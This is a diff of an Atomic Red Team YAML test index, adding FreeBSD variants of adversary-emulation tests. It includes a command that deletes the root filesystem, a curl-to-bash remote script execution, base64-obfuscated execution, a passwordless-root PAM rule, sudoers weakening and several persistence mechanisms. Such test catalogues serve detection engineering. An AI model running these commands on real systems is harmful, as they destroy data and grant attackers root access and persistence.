description: 'Creates a root CA with openssl
'
supported_platforms:
- linux
input_arguments:
cert_filename:
description: Path of the CA certificate we create
type: path
default: rootCA.crt
key_filename:
description: Key we create that is used to create the CA certificate
type: path
default: rootCA.key
executor:
command: |
openssl genrsa -out #{key_filename} 4096
openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename}
cp #{cert_filename} /usr/local/share/certs/
certctl rehash
cleanup_command: |
rm /usr/local/share/certs/#{cert_filename}
certctl rehash
name: sh
elevation_required: true
- name: Install root CA on Debian/Ubuntu
auto_generated_guid: 53bcf8a0-1549-4b85-b919-010c56d724ff
description: 'Creates a root CA with openssl
@@ -14786,7 +15504,6 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -14818,7 +15535,6 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -14849,7 +15565,6 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -16496,7 +17211,6 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -16534,7 +17248,6 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -16590,6 +17303,20 @@ defense-evasion:
'
name: bash
- name: Delete Filesystem - FreeBSD
auto_generated_guid: b5aaca7e-a48f-4f1b-8f0f-a27b8f516608
description: 'This test deletes the entire root filesystem of a FreeBSD system.
This technique was used by Amnesia IoT malware to avoid analysis. This test
is dangerous and destructive, do NOT use on production equipment.
'
supported_platforms:
- linux
executor:
command: |
chflags -R 0 /
rm -rf / > /dev/null 2> /dev/null
name: sh
T1158:
technique:
x_mitre_platforms:
@@ -17285,6 +18012,22 @@ defense-evasion:
chmod +x 'testdirwithspaceend /init '
'./testdirwithspaceend /init '
cleanup_command: rm -rf /tmp/atomic-test-T1036.006
- name: Space After Filename (FreeBSD)
auto_generated_guid: cfc1fbb5-caae-4f4c-bfa8-1b7c8b5cc4e8
description: 'Space after filename.
'
supported_platforms:
- linux
executor:
name: sh
command: "mkdir -p /tmp/atomic-test-T1036.006\ncd /tmp/atomic-test-T1036.006\nmkdir
-p 'testdirwithspaceend '\n/bin/echo \"#\\!/bin/sh\" > \"testdirwithspaceend
/init \" && echo 'echo \"print(\\\"running T1035.006 with space after filename
to masquerade init\\\")\" | python3.9' >> \"testdirwithspaceend /init \"
&& echo \"exit\" >> \"testdirwithspaceend /init \" \nchmod +x 'testdirwithspaceend
/init '\n'./testdirwithspaceend /init '\n"
cleanup_command: rm -rf /tmp/atomic-test-T1036.006
T1550.002:
technique:
modified: '2023-03-30T21:01:45.141Z'
@@ -17923,7 +18666,6 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
- macos
executor:
@@ -19039,6 +19781,23 @@ defense-evasion:
whoami
exit
cleanup_command: "userdel -r art \n"
- name: Create local account (FreeBSD)
auto_generated_guid: 95158cc9-8f6d-4889-9531-9be3f7f095e0
description: 'An adversary may wish to create an account with admin privileges
to work with. In this test we create a "art" user with the password art, switch
to art, execute whoami, exit and delete the art user.
'
supported_platforms:
- linux
executor:
name: sh
elevation_required: true
command: "pw useradd art -g wheel -s /bin/sh\necho $(openssl passwd -1 art)
| pw mod user testuser1 -h 0 \nsu art\nwhoami\nexit\n"
cleanup_command: 'rmuser -y art
'
- name: Reactivate a locked/expired account (Linux)
auto_generated_guid: d2b95631-62d7-45a3-aaef-0972cea97931
description: "A system administrator may have locked and expired a user account
@@ -19062,6 +19821,30 @@ defense-evasion:
whoami
exit
cleanup_command: "userdel -r art \n"
- name: Reactivate a locked/expired account (FreeBSD)
auto_generated_guid: '09e3380a-fae5-4255-8b19-9950be0252cf'
description: "A system administrator may have locked and expired a user account
rather than deleting it. \"the user is coming back, at some stage\" An adversary
may reactivate a inactive account in an attempt to appear legitimate. \n\nIn
this test we create a \"art\" user with the password art, lock and expire
the account, try to su to art and fail, unlock and renew the account, su successfully,
then delete the account.\n"
supported_platforms:
- linux
executor:
name: sh
elevation_required: true
command: |
pw useradd art -g wheel -s /bin/sh
echo $(openssl passwd -1 art) | pw mod user testuser1 -h 0
pw lock art
pw usermod art -e +1d
pw unlock art
pw user mod art -e +99d
su art
whoami
exit
cleanup_command: "rmuser -y art \n"
- name: Login as nobody (Linux)
auto_generated_guid: 3d2cd093-ee05-41bd-a802-59ee5c301b85
description: 'An adversary may try to re-purpose a system account to appear
@@ -19080,6 +19863,26 @@ defense-evasion:
nobody\nsu nobody\nwhoami\nexit\n"
cleanup_command: "chsh --shell /usr/sbin/nologin nobody\ncat /etc/passwd |grep
nobody \n# -> nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n"
- name: Login as nobody (freebsd)
auto_generated_guid: 16f6374f-7600-459a-9b16-6a88fd96d310
description: 'An adversary may try to re-purpose a system account to appear
legitimate. In this test change the login shell of the nobody account, change
its password to nobody, su to nobody, exit, then reset nobody''s shell to
/usr/sbin/nologin.
'
supported_platforms:
- linux
executor:
name: sh
elevation_required: true
command: "cat /etc/passwd |grep nobody \n# -> nobody:x:65534:65534:Unprivileged
user:/nonexistent:/usr/sbin/nologin\npw usermod nobody -s /bin/sh\necho
$(openssl passwd -1 art) | pw mod user nobody -h 0\nsu nobody\nwhoami\nexit\n"
cleanup_command: |
pw usermod nobody -s /usr/sbin/nologin
cat /etc/passwd |grep nobody
# -> nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
T1211:
technique:
x_mitre_platforms:
@@ -20427,6 +21230,27 @@ privilege-escalation:
name: sh
elevation_required: true
command: "sudo -l \nsudo cat /etc/sudoers\nsudo vim /etc/sudoers\n"
- name: Sudo usage (freebsd)
auto_generated_guid: 2bf9a018-4664-438a-b435-cc6f8c6f71b1
description: 'Common Sudo enumeration methods.
'
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: 'Check if sudo is installed.
'
prereq_command: 'if [ ! -x "$(command -v sudo)" ]; then exit 1; else exit
0; fi;
'
get_prereq_command: "(which pkg && pkg install -y sudo)\n"
executor:
name: sh
elevation_required: true
command: "sudo -l \nsudo cat /usr/local/etc/sudoers\nsudo ee /usr/local/etc/sudoers\n"
- name: Unlimited sudo cache timeout
auto_generated_guid: a7b17659-dd5e-46f7-b7d1-e6792c91d0bc
description: 'Sets sudo caching timestamp_timeout to a value for unlimited.
@@ -20443,6 +21267,31 @@ privilege-escalation:
command: |
sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /etc/sudoers
sudo visudo -c -f /etc/sudoers
- name: Unlimited sudo cache timeout (freebsd)
auto_generated_guid: a83ad6e8-6f24-4d7f-8f44-75f8ab742991
description: 'Sets sudo caching timestamp_timeout to a value for unlimited.
This is dangerous to modify without using ''visudo'', do not do this on a
production system.
'
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: 'Check if sudo is installed.
'
prereq_command: 'if [ ! -x "$(command -v sudo)" ]; then exit 1; else exit
0; fi;
'
get_prereq_command: "(which pkg && pkg install -y sudo)\n"
executor:
name: sh
elevation_required: true
command: |
sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /usr/local/etc/sudoers
sudo visudo -c -f /usr/local/etc/sudoers
- name: Disable tty_tickets for sudo caching
auto_generated_guid: 91a60b03-fb75-4d24-a42e-2eb8956e8de1
description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous
@@ -20458,6 +21307,30 @@ privilege-escalation:
command: |
sudo sh -c "echo Defaults "'!'"tty_tickets >> /etc/sudoers"
sudo visudo -c -f /etc/sudoers
- name: Disable tty_tickets for sudo caching (freebsd)
auto_generated_guid: 4df6a0fe-2bdd-4be8-8618-a6a19654a57a
description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous
to modify without using ''visudo'', do not do this on a production system.
'
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: 'Check if sudo is installed.
'
prereq_command: 'if [ ! -x "$(command -v sudo)" ]; then exit 1; else exit
0; fi;
'
get_prereq_command: "(which pkg && pkg install -y sudo)\n"
executor:
name: sh
elevation_required: true
command: |
sudo sh -c "echo Defaults "'!'"tty_tickets >> /usr/local/etc/sudoers"
sudo visudo -c -f /usr/local/etc/sudoers
T1574.011:
technique:
modified: '2023-03-30T21:01:38.651Z'
@@ -21218,9 +22091,8 @@ privilege-escalation:
'
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
command:
description: Command to execute
@@ -21271,6 +22143,33 @@ privilege-escalation:
rm /etc/cron.hourly/#{cron_script_name}
rm /etc/cron.monthly/#{cron_script_name}
rm /etc/cron.weekly/#{cron_script_name}
- name: Cron - Add script to /etc/cron.d folder
auto_generated_guid: '078e69eb-d9fb-450e-b9d0-2e118217c846'
description: 'This test adds a script to /etc/cron.d folder configured to execute
on a schedule.
'
supported_platforms:
- linux
input_arguments:
command:
description: Command to execute
type: string
default: echo '*/5 * * * * root echo "Hello
from Atomic Red Team"' > /tmp/atomic.log
cron_script_name:
description: Name of file to store in cron folder
type: string
default: persistevil
executor:
elevation_required: true
name: sh
command: 'echo "#{command}" > /etc/cron.d/#{cron_script_name}
'
cleanup_command: 'rm /etc/cron.d/#{cron_script_name}
'
- name: Cron - Add script to /var/spool/cron/crontabs/ folder
auto_generated_guid: 2d943c18-e74a-44bf-936f-25ade6cccab4
description: 'This test adds a script to a /var/spool/cron/crontabs folder configured
@@ -23220,6 +24119,32 @@ privilege-escalation:
command: 'bash -c ''trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh"
EXIT''
'
cleanup_command: 'rm -f /tmp/art-fish.txt
'
name: sh
- name: Trap EXIT (freebsd)
auto_generated_guid: be1a5d70-6865-44aa-ab50-42244c9fd16f
description: |
Launch bash shell with command arg to create TRAP on EXIT.
The trap executes script that writes to /tmp/art-fish.txt
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: 'Check if bash is installed.
'
prereq_command: 'if [ ! -x "$(command -v bash)" ]; then exit 1; else exit
0; fi;
'
get_prereq_command: "(which pkg && pkg install -y bash)\n"
executor:
command: 'bash -c ''trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh"
EXIT''
'
cleanup_command: 'rm -f /tmp/art-fish.txt
@@ -23237,6 +24162,32 @@ privilege-escalation:
command: 'bash -c ''trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh"
SIGINT && kill -SIGINT $$''
'
cleanup_command: 'rm -f /tmp/art-fish.txt
'
name: sh
- name: Trap SIGINT (freebsd)
auto_generated_guid: ade10242-1eac-43df-8412-be0d4c704ada
description: |
Launch bash shell with command arg to create TRAP on SIGINT (CTRL+C), then send SIGINT signal.
The trap executes script that writes to /tmp/art-fish.txt
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: 'Check if bash is installed.
'
prereq_command: 'if [ ! -x "$(command -v bash)" ]; then exit 1; else exit
0; fi;
'
get_prereq_command: "(which pkg && pkg install -y bash)\n"
executor:
command: 'bash -c ''trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh"
SIGINT && kill -SIGINT $$''
'
cleanup_command: 'rm -f /tmp/art-fish.txt
@@ -23904,6 +24855,32 @@ privilege-escalation:
sudo rm /tmp/hello.c
name: sh
elevation_required: true
- name: Make and modify binary from C source (freebsd)
auto_generated_guid: dd580455-d84b-481b-b8b0-ac96f3b1dc4c
description: 'Make, change owner, and change file attributes on a C source code
file
'
supported_platforms:
- linux
input_arguments:
payload:
description: hello.c payload
type: path
default: PathToAtomicsFolder/T1548.001/src/hello.c
executor:
command: |
cp #{payload} /tmp/hello.c
chown root /tmp/hello.c
make /tmp/hello
chown root /tmp/hello
chmod u+s /tmp/hello
/tmp/hello
cleanup_command: |
rm /tmp/hello
rm /tmp/hello.c
name: sh
elevation_required: true
- name: Set a SetUID flag on file
auto_generated_guid: 759055b3-3885-4582-a8ec-c00c9d64dd79
description: 'This test sets the SetUID flag on a file in FreeBSD.
@@ -23927,6 +24904,28 @@ privilege-escalation:
'
name: sh
elevation_required: true
- name: Set a SetUID flag on file (freebsd)
auto_generated_guid: 9be9b827-ff47-4e1b-bef8-217db6fb7283
description: 'This test sets the SetUID flag on a file in FreeBSD.
'
supported_platforms:
- linux
input_arguments:
file_to_setuid:
description: Path of file to set SetUID flag
type: path
default: "/tmp/evilBinary"
executor:
command: |
touch #{file_to_setuid}
chown root #{file_to_setuid}
chmod u+xs #{file_to_setuid}
cleanup_command: 'rm #{file_to_setuid}
'
name: sh
elevation_required: true
- name: Set a SetGID flag on file
auto_generated_guid: db55f666-7cba-46c6-9fe6-205a05c3242c
description: 'This test sets the SetGID flag on a file in Linux and macOS.
@@ -23950,6 +24949,28 @@ privilege-escalation:
'
name: sh
elevation_required: true
- name: Set a SetGID flag on file (freebsd)
auto_generated_guid: 1f73af33-62a8-4bf1-bd10-3bea931f2c0d
description: 'This test sets the SetGID flag on a file in FreeBSD.
'
supported_platforms:
- linux
input_arguments:
file_to_setuid:
description: Path of file to set SetGID flag
type: path
default: "/tmp/evilBinary"
executor:
command: |
touch #{file_to_setuid}
chown root #{file_to_setuid}
chmod g+xs #{file_to_setuid}
cleanup_command: 'rm #{file_to_setuid}
'
name: sh
elevation_required: true
- name: Make and modify capabilities of a binary
auto_generated_guid: db53959c-207d-4000-9e7a-cd8eb417e072
description: |
@@ -24003,7 +25024,6 @@ privilege-escalation:
'
supported_platforms:
- freebsd
- linux
executor:
command: 'find /usr/bin -perm -4000
@@ -24017,7 +25037,6 @@ privilege-escalation:
'
supported_platforms:
- freebsd
- linux
executor:
command: 'find /usr/bin -perm -2000
@@ -26940,6 +27959,26 @@ privilege-escalation:
head -n '-2' ~/.bashrc > /tmp/T1546.004
mv /tmp/T1546.004 ~/.bashrc
name: sh
- name: Add command to .shrc
auto_generated_guid: 41502021-591a-4649-8b6e-83c9192aff53
description: 'Adds a command to the .shrc file of the current user
'
supported_platforms:
- linux
input_arguments:
command_to_add:
description: Command to add to the .shrc file
type: string
default: echo "Hello from Atomic Red Team T1546.004" > /tmp/T1546.004
executor:
command: 'echo ''#{command_to_add}'' >> ~/.shrc
'
cleanup_command: |
head -n '-2' ~/.shrc > /tmp/T1546.004
mv /tmp/T1546.004 ~/.shrc
name: sh
- name: Append to the system shell profile
auto_generated_guid: 694b3cc8-6a78-4d35-9e74-0123d009e94b
description: 'An adversary may wish to establish persistence by executing malicious
@@ -26947,7 +27986,6 @@ privilege-escalation:
'
supported_platforms:
- freebsd
- linux
input_arguments:
text_to_append:
@@ -26970,7 +28008,6 @@ privilege-escalation:
'
supported_platforms:
- freebsd
- linux
input_arguments:
text_to_append:
@@ -28466,6 +29503,27 @@ privilege-escalation:
];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local &&
sudo rm $origfilename;fi
'
- name: rc.local (FreeBSD)
auto_generated_guid: 2015fb48-8ab6-4fbf-928b-0b62de5c9476
description: 'Modify rc.local
'
supported_platforms:
- linux
executor:
name: sh
elevation_required: true
command: |
filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi
printf '%s\n' '#\!/usr/local/bin/bash' | sudo tee /etc/rc.local
echo 'python3.9 -c "import os, base64;exec(base64.b64decode(\"aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo=\"))"' | sudo tee -a /etc/rc.local
printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.local
sudo chmod +x /etc/rc.local
cleanup_command: 'origfilename=''/etc/rc.local.original'';if [ ! -f $origfilename
];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local &&
sudo rm $origfilename;fi
'
T1134:
technique:
@@ -28741,6 +29799,45 @@ privilege-escalation:
rm -rf #{systemd_service_path}/#{systemd_service_file}
systemctl daemon-reload
name: bash
- name: Create SysV Service
auto_generated_guid: 760fe8d2-79d9-494f-905e-a239a3df86f6
description: 'This test creates a SysV service unit file and enables it as a
service.
'
supported_platforms:
- linux
input_arguments:
rc_service_path:
description: Path to rc service file
type: path
default: "/usr/local/etc/rc.d"
rc_service_file:
description: File name of rc service file
type: string
default: art-test
executor:
command: "echo '#\\!/bin/sh' > #{rc_service_path}/#{rc_service_file}\necho
' ' >> #{rc_service_path}/#{rc_service_file}\necho '#' >> #{rc_service_path}/#{rc_service_file}\necho
'# PROVIDE: art-test' >> #{rc_service_path}/#{rc_service_file}\necho '#
REQUIRE: LOGIN' >> #{rc_service_path}/#{rc_service_file}\necho '# KEYWORD:
shutdown' >> #{rc_service_path}/#{rc_service_file}\necho ' ' >> #{rc_service_path}/#{rc_service_file}\necho
'. /etc/rc.subr' >> #{rc_service_path}/#{rc_service_file}\necho ' ' >> #{rc_service_path}/#{rc_service_file}\necho
'name=\"art_test\"' >> #{rc_service_path}/#{rc_service_file}\necho 'rcvar=art_test_enable'
>> #{rc_service_path}/#{rc_service_file}\necho 'load_rc_config ${name}'
>> #{rc_service_path}/#{rc_service_file}\necho 'command=\"/usr/bin/touch\"'
>> #{rc_service_path}/#{rc_service_file}\necho 'start_cmd=\"art_test_start\"'
>> #{rc_service_path}/#{rc_service_file}\necho '' >> #{rc_service_path}/#{rc_service_file}\necho
'art_test_start()' >> #{rc_service_path}/#{rc_service_file} \necho '{'
>> #{rc_service_path}/#{rc_service_file}\necho ' ${command} /tmp/art-test.marker'
>> #{rc_service_path}/#{rc_service_file}\necho '}' >> #{rc_service_path}/#{rc_service_file}\necho
' ' >> #{rc_service_path}/#{rc_service_file} \necho 'run_rc_command
\"$1\"' >> #{rc_service_path}/#{rc_service_file}\nchmod +x #{rc_service_path}/#{rc_service_file}\nservice
art-test enable\nservice art-test start\n"
cleanup_command: |
sysrc -x art_test_enable
rm -f #{rc_service_path}/#{rc_service_file}
name: sh
- name: Create Systemd Service file, Enable the service , Modify and Reload the
service.
auto_generated_guid: c35ac4a8-19de-43af-b9f8-755da7e89c89
@@ -29711,6 +30808,39 @@ privilege-escalation:
name: sh
elevation_required: false
command: 'echo "#{at_command}" | at #{time_spec}'
- name: At - Schedule a job freebsd
auto_generated_guid: 549863fb-1c91-467e-97fc-1fa32b9f356b
description: 'This test submits a command to be run in the future by the `at`
daemon.
'
supported_platforms:
- linux
input_arguments:
time_spec:
description: Time specification of when the command should run
type: string
default: now + 1 minute
at_command:
description: The command to be run
type: string
default: echo Hello from Atomic Red Team
dependency_executor_name: sh
dependencies:
- description: 'The `at` executable must exist in the PATH
'
prereq_command: 'which at
'
get_prereq_command: 'echo ''Please install `at` ; they were not found in the
PATH (Package name: `at`)''
'
executor:
name: sh
elevation_required: false
command: 'echo "#{at_command}" | at #{time_spec}'
T1055.001:
technique:
modified: '2022-10-18T21:07:23.748Z'
@@ -30036,6 +31166,23 @@ privilege-escalation:
whoami
exit
cleanup_command: "userdel -r art \n"
- name: Create local account (FreeBSD)
auto_generated_guid: 95158cc9-8f6d-4889-9531-9be3f7f095e0
description: 'An adversary may wish to create an account with admin privileges
to work with. In this test we create a "art" user with the password art, switch
to art, execute whoami, exit and delete the art user.
'
supported_platforms:
- linux
executor:
name: sh
elevation_required: true
command: "pw useradd art -g wheel -s /bin/sh\necho $(openssl passwd -1 art)
| pw mod user testuser1 -h 0 \nsu art\nwhoami\nexit\n"
cleanup_command: 'rmuser -y art
'
- name: Reactivate a locked/expired account (Linux)
auto_generated_guid: d2b95631-62d7-45a3-aaef-0972cea97931
description: "A system administrator may have locked and expired a user account
@@ -30059,6 +31206,30 @@ privilege-escalation:
whoami
exit
cleanup_command: "userdel -r art \n"
- name: Reactivate a locked/expired account (FreeBSD)
auto_generated_guid: '09e3380a-fae5-4255-8b19-9950be0252cf'
description: "A system administrator may have locked and expired a user account
rather than deleting it. \"the user is coming back, at some stage\" An adversary
may reactivate a inactive account in an attempt to appear legitimate. \n\nIn
this test we create a \"art\" user with the password art, lock and expire
the account, try to su to art and fail, unlock and renew the account, su successfully,
then delete the account.\n"
supported_platforms:
- linux
executor:
name: sh
elevation_required: true
command: |
pw useradd art -g wheel -s /bin/sh
echo $(openssl passwd -1 art) | pw mod user testuser1 -h 0
pw lock art
pw usermod art -e +1d
pw unlock art
pw user mod art -e +99d
su art
whoami
exit
cleanup_command: "rmuser -y art \n"
- name: Login as nobody (Linux)
auto_generated_guid: 3d2cd093-ee05-41bd-a802-59ee5c301b85
description: 'An adversary may try to re-purpose a system account to appear
@@ -30077,6 +31248,26 @@ privilege-escalation:
nobody\nsu nobody\nwhoami\nexit\n"
cleanup_command: "chsh --shell /usr/sbin/nologin nobody\ncat /etc/passwd |grep
nobody \n# -> nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n"
- name: Login as nobody (freebsd)
auto_generated_guid: 16f6374f-7600-459a-9b16-6a88fd96d310
description: 'An adversary may try to re-purpose a system account to appear
legitimate. In this test change the login shell of the nobody account, change
its password to nobody, su to nobody, exit, then reset nobody''s shell to
/usr/sbin/nologin.
'
supported_platforms:
- linux
executor:
name: sh
elevation_required: true
command: "cat /etc/passwd |grep nobody \n# -> nobody:x:65534:65534:Unprivileged
user:/nonexistent:/usr/sbin/nologin\npw usermod nobody -s /bin/sh\necho
$(openssl passwd -1 art) | pw mod user nobody -h 0\nsu nobody\nwhoami\nexit\n"
cleanup_command: |
pw usermod nobody -s /usr/sbin/nologin
cat /etc/passwd |grep nobody
# -> nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
T1574.012:
technique:
x_mitre_platforms:
@@ -30849,9 +32040,8 @@ execution:
'
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
command:
description: Command to execute
@@ -30902,6 +32092,33 @@ execution:
rm /etc/cron.hourly/#{cron_script_name}
rm /etc/cron.monthly/#{cron_script_name}
rm /etc/cron.weekly/#{cron_script_name}
- name: Cron - Add script to /etc/cron.d folder
auto_generated_guid: '078e69eb-d9fb-450e-b9d0-2e118217c846'
description: 'This test adds a script to /etc/cron.d folder configured to execute
on a schedule.
'
supported_platforms:
- linux
input_arguments:
command:
description: Command to execute
type: string
default: echo '*/5 * * * * root echo "Hello
from Atomic Red Team"' > /tmp/atomic.log
cron_script_name:
description: Name of file to store in cron folder
type: string
default: persistevil
executor:
elevation_required: true
name: sh
command: 'echo "#{command}" > /etc/cron.d/#{cron_script_name}
'
cleanup_command: 'rm /etc/cron.d/#{cron_script_name}
'
- name: Cron - Add script to /var/spool/cron/crontabs/ folder
auto_generated_guid: 2d943c18-e74a-44bf-936f-25ade6cccab4
description: 'This test adds a script to a /var/spool/cron/crontabs folder configured
@@ -33103,7 +34320,6 @@ execution:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -33128,7 +34344,6 @@ execution:
Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`.
supported_platforms:
- freebsd
- linux
- macos
executor:
@@ -33222,7 +34437,6 @@ execution:
'
supported_platforms:
- freebsd
- linux
executor:
name: sh
@@ -33242,7 +34456,6 @@ execution:
'
supported_platforms:
- freebsd
- linux
executor:
name: sh
@@ -33260,7 +34473,6 @@ execution:
'
supported_platforms:
- freebsd
- linux
executor:
name: sh
@@ -33275,7 +34487,6 @@ execution:
'
supported_platforms:
- freebsd
- linux
executor:
name: sh
@@ -33299,6 +34510,25 @@ execution:
elevation_required: false
command: "ART=$(echo -n \"id\" |base64 -w 0)\necho \"\\$ART=$ART\"\necho -n
\"$ART\" |base64 -d |/bin/bash\nunset ART \n"
- name: Obfuscated command line scripts (freebsd)
auto_generated_guid: 5dc1d9dd-f396-4420-b985-32b1c4f79062
description: 'An adversary may pre-compute the base64 representations of the
terminal commands that they wish to execute in an attempt to avoid or frustrate
detection. The following commands base64 encodes the text string id, then
base64 decodes the string, then pipes it as a command to bash, which results
in the id command being executed.
'
supported_platforms:
- linux
executor:
name: sh
elevation_required: false
command: |
ART=$(echo -n "id" |b64encode -r -)
echo "\$ART=$ART"
echo -n "$ART" |b64decode -r |/bin/sh
unset ART
- name: Change login shell
auto_generated_guid: c7ac59cb-13cc-4622-81dc-6d2fee9bfac7
description: "An adversary may want to use a different login shell. The chsh
@@ -33329,6 +34559,37 @@ execution:
cat /etc/passwd |grep ^art
cleanup_command: 'userdel art
'
- name: Change login shell (freebsd)
auto_generated_guid: 33b68b9b-4988-4caf-9600-31b7bf04227c
description: "An adversary may want to use a different login shell. The chsh
command changes the user login shell. The following test, creates an art user
with a /bin/sh shell, changes the users shell to sh, then deletes the art
user. \n"
supported_platforms:
- linux
dependencies:
- description: 'chsh - change login shell, must be installed
'
prereq_command: 'if [ -f /usr/bin/chsh ]; then echo "exit 0"; else echo "exit
1"; exit 1; fi
'
get_prereq_command: 'echo "Automated installer not implemented yet, please
install chsh manually"
'
executor:
name: sh
elevation_required: true
command: |
pw useradd art -g wheel -s /bin/csh
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
cleanup_command: 'rmuser -y art
'
- name: Environment variable scripts
auto_generated_guid: bdaebd56-368b-4970-a523-f905ff4a8a51
@@ -33348,6 +34609,25 @@ execution:
echo $ART |/bin/bash
cleanup_command: 'unset ART
'
- name: Environment variable scripts (freebsd)
auto_generated_guid: 663b205d-2121-48a3-a6f9-8c9d4d87dfee
description: 'An adversary may place scripts in an environment variable because
they can''t or don''t wish to create script files on the host. The following
test, in a bash shell, exports the ART variable containing an echo command,
then pipes the variable to /bin/sh
'
supported_platforms:
- linux
executor:
name: sh
elevation_required: false
command: |
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
cleanup_command: 'unset ART
'
- name: Detecting pipe-to-shell
auto_generated_guid: fca246a8-a585-4f28-a2df-6495973976a1
@@ -33387,6 +34667,42 @@ execution:
cleanup_command: 'rm /tmp/art.txt
'
- name: Detecting pipe-to-shell (freebsd)
auto_generated_guid: 1a06b1ec-0cca-49db-a222-3ebb6ef25632
description: 'An adversary may develop a useful utility or subvert the CI/CD
pipe line of a legitimate utility developer, who requires or suggests installing
their utility by piping a curl download directly into bash. Of-course this
is a very bad idea. The adversary may also take advantage of this BLIND install
method and selectively running extra commands in the install script for those
who DO pipe to bash and not for those who DO NOT. This test uses curl to download
the pipe-to-shell.sh script, the first time without piping it to bash and
the second piping it into bash which executes the echo command.
'
supported_platforms:
- linux
input_arguments:
remote_url:
description: url of remote payload
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/pipe-to-shell.sh
dependency_executor_name: sh
dependencies:
- description: 'Check if running on a Debian based machine.
'
prereq_command: |
if grep -iq "FreeBSD" /etc/os-release; then echo "FreeBSD"; else echo "NOT FreeBSD"; exit 1; fi
if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
get_prereq_command: 'pkg update && pkg install -y curl
'
executor:
name: sh
elevation_required: false
command: "cd /tmp\ncurl -s #{remote_url}\nls -la /tmp/art.txt\ncurl -s #{remote_url}
|bash\nls -la /tmp/art.txt \n"
cleanup_command: "rm /tmp/art.txt \n"
- name: Current kernel information enumeration
auto_generated_guid: 3a53734a-9e26-4f4b-ad15-059e767f5f14
description: 'An adversary may want to enumerate the kernel information to tailor
@@ -33830,7 +35146,6 @@ execution:
description: Download and execute shell script and write to file then execute
locally using Python -c (command mode)
supported_platforms:
- freebsd
- linux
input_arguments:
script_url:
@@ -33872,7 +35187,6 @@ execution:
description: Create Python file (.py) that downloads and executes shell script
via executor arguments
supported_platforms:
- freebsd
- linux
input_arguments:
python_script_name:
@@ -33930,7 +35244,6 @@ execution:
'
supported_platforms:
- freebsd
- linux
input_arguments:
python_script_name:
@@ -33995,7 +35308,6 @@ execution:
'
supported_platforms:
- freebsd
- linux
dependencies:
- description: 'Verify if python is in the environment variable path and attempt
@@ -34845,6 +36157,39 @@ execution:
name: sh
elevation_required: false
command: 'echo "#{at_command}" | at #{time_spec}'
- name: At - Schedule a job freebsd
auto_generated_guid: 549863fb-1c91-467e-97fc-1fa32b9f356b
description: 'This test submits a command to be run in the future by the `at`
daemon.
'
supported_platforms:
- linux
input_arguments:
time_spec:
description: Time specification of when the command should run
type: string
default: now + 1 minute
at_command:
description: The command to be run
type: string
default: echo Hello from Atomic Red Team
dependency_executor_name: sh
dependencies:
- description: 'The `at` executable must exist in the PATH
'
prereq_command: 'which at
'
get_prereq_command: 'echo ''Please install `at` ; they were not found in the
PATH (Package name: `at`)''
'
executor:
name: sh
elevation_required: false
command: 'echo "#{at_command}" | at #{time_spec}'
T1035:
technique:
x_mitre_platforms:
@@ -35613,6 +36958,36 @@ persistence:
'
cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}
'
- name: Malicious PAM rule (freebsd)
auto_generated_guid: b17eacac-282d-4ca8-a240-46602cf863e3
description: |
Inserts a rule into a PAM config and then tests it.
Upon successful execution, this test will insert a rule that allows every user to su to root without a password.
supported_platforms:
- linux
input_arguments:
path_to_pam_conf:
description: PAM config file to modify.
type: string
default: "/etc/pam.d/su"
pam_rule:
description: Rule to add to the PAM config.
type: string
default: auth sufficient pam_succeed_if.so uid >= 0
index:
description: Index where the rule is inserted.
type: integer
default: 8
executor:
name: sh
elevation_required: true
command: 'sudo sed -i "" "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
'
cleanup_command: 'sudo sed -i "" "/#{pam_rule}/d" #{path_to_pam_conf}
'
- name: Malicious PAM module
